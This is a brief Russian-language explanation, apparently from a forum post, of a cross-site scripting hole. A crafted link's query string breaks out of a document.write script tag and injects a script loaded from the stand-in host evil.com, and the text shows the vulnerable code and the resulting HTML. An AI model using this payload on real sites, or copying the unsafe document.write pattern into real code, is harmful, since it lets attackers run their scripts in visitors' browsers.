вот ссылка для клика:
www.name.ru/index.htm?1.js"></script><script src="http://www.evil.com/script
вот что получится в скрипте:
url = '1.js"></script><script src="http://www.evil.com/script';
document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js"><\/script>')
Итого в документ запишется:
<script TYPE="text/javascript" src="www.name.ru/1.js"></script><script src="http://www.evil.com/script.js"></script>'